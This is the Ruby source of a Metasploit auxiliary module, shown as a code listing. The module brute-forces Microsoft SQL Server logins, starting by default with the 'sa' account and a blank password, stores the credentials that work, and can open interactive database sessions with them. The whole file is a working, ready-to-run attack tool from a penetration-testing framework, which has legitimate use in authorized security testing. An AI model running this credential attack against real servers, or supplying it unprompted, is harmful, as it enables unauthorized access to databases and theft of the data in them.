Path: blob/master/modules/auxiliary/scanner/mssql/mssql_login.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasploit/framework/credential_collection'6require 'metasploit/framework/login_scanner/mssql'7require 'rex/proto/mssql/client'8require 'rex/post/mssql'910class MetasploitModule < Msf::Auxiliary11include Msf::Exploit::Remote::MSSQL12include Msf::Auxiliary::Report13include Msf::Auxiliary::AuthBrute14include Msf::Auxiliary::CommandShell15include Msf::Auxiliary::Scanner16include Msf::Sessions::CreateSessionOptions17include Msf::Auxiliary::ReportSummary1819def initialize20super(21'Name' => 'MSSQL Login Utility',22'Description' => 'This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).',23'Author' => 'MC',24'References' => [25[ 'CVE', '1999-0506'] # Weak password26],27'License' => MSF_LICENSE,28# some overrides from authbrute since there is a default username and a blank password29'DefaultOptions' => {30'USERNAME' => 'sa',31'BLANK_PASSWORDS' => true,32'CreateSession' => false33}34)35register_options([36Opt::Proxies,37OptBool.new('TDSENCRYPTION', [ true, 'Use TLS/SSL for TDS data "Force Encryption"', false]),38OptBool.new('CreateSession', [false, 'Create a new session for every successful login', false])39])4041if framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)42add_info('New in Metasploit 6.4 - The %grnCreateSession%clr option within this module can open an interactive session')43else44options_to_deregister = %w[CreateSession]45end46deregister_options(*options_to_deregister)47end4849def create_session?50if framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)51datastore['CreateSession']52else53false54end55end5657def run58results = super59logins = results.flat_map { |_k, v| v[:successful_logins] }60sessions = results.flat_map { |_k, v| v[:successful_sessions] }61print_status("Bruteforce completed, #{logins.size} #{logins.size == 1 ? 'credential was' : 'credentials were'} successful.")62return results unless framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)6364if create_session?65print_status("#{sessions.size} MSSQL #{sessions.size == 1 ? 'session was' : 'sessions were'} opened successfully.")66else67print_status('You can open an MSSQL session with these credentials and %grnCreateSession%clr set to true')68end69results70end7172def run_host(ip)73print_status("#{rhost}:#{rport} - MSSQL - Starting authentication scanner.")7475if datastore['TDSENCRYPTION']76if create_session?77raise Msf::OptionValidateError.new(78{79'TDSENCRYPTION' => "Cannot create sessions when encryption is enabled. See https://github.com/rapid7/metasploit-framework/issues/18745 to vote for this feature"80}81)82else83print_status("TDS Encryption enabled")84end85end8687cred_collection = build_credential_collection(88realm: datastore['DOMAIN'],89username: datastore['USERNAME'],90password: datastore['PASSWORD']91)9293scanner = Metasploit::Framework::LoginScanner::MSSQL.new(94configure_login_scanner(95host: ip,96port: rport,97proxies: datastore['PROXIES'],98cred_details: cred_collection,99stop_on_success: datastore['STOP_ON_SUCCESS'],100bruteforce_speed: datastore['BRUTEFORCE_SPEED'],101connection_timeout: 30,102max_send_size: datastore['TCP::max_send_size'],103send_delay: datastore['TCP::send_delay'],104auth: datastore['Mssql::Auth'],105domain_controller_rhost: datastore['DomainControllerRhost'],106hostname: datastore['Mssql::Rhostname'],107windows_authentication: datastore['USE_WINDOWS_AUTHENT'],108tdsencryption: datastore['TDSENCRYPTION'],109framework: framework,110framework_module: self,111use_client_as_proof: create_session?,112ssl: datastore['SSL'],113ssl_version: datastore['SSLVersion'],114ssl_verify_mode: datastore['SSLVerifyMode'],115ssl_cipher: datastore['SSLCipher'],116local_port: datastore['CPORT'],117local_host: datastore['CHOST']118)119)120successful_logins = []121successful_sessions = []122scanner.scan! do |result|123credential_data = result.to_h124credential_data.merge!(125module_fullname: self.fullname,126workspace_id: myworkspace_id127)128if result.success?129credential_core = create_credential(credential_data)130credential_data[:core] = credential_core131create_credential_login(credential_data)132print_good "#{ip}:#{rport} - Login Successful: #{result.credential}"133successful_logins << result134135if create_session?136begin137successful_sessions << session_setup(result)138rescue ::StandardError => e139elog('Failed to setup the session', error: e)140print_brute level: :error, ip: ip, msg: "Failed to setup the session - #{e.class} #{e.message}"141result.connection.close unless result.connection.nil?142end143end144else145invalidate_login(credential_data)146vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"147end148end149{ successful_logins: successful_logins, successful_sessions: successful_sessions }150end151152# @param [Metasploit::Framework::LoginScanner::Result] result153# @return [Msf::Sessions::MSSQL]154def session_setup(result)155return unless (result.connection && result.proof)156157my_session = Msf::Sessions::MSSQL.new(result.connection, { client: result.proof, **result.proof.detect_platform_and_arch })158merge_me = {159'USERPASS_FILE' => nil,160'USER_FILE' => nil,161'PASS_FILE' => nil,162'USERNAME' => result.credential.public,163'PASSWORD' => result.credential.private164}165166start_session(self, nil, merge_me, false, my_session.rstream, my_session)167end168end169170171